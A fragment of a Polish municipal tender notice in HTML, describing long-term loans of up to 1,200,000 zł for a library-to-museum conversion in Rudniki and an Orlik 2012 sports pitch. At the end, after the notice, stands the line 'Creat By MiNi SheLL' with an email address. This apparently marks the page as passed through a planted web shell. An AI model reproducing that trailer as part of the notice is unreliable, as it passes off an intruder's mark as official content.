<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.06.2018.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> OR 272.PN 8.2011. zadanie nr2
Kredyty  długoterminowe na zadania inwestycyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmuje kredyty długoterminowe na przedsięwzięcia inwestycyjne do wysokości 
1 200 000 zł z okresem ich spłaty wraz z odsetkami do dnia 13 czerwca 2018r.
W zakres przedmiotowego zadania wchodzą następujące inwestycje:
1. Przebudowa budynku biblioteki w Rudnikach na muzeum osobliwości przyrodniczych 
    i punkt informacji turystycznej - planowana wartości kredytu do kwoty 600 000 zł,
2. Budowa boiska o sztucznej nawierzchni w ramach programu  Orlik 2012  -  
    planowana  wartości kredytu do kwoty 600 000 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.06.2018.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com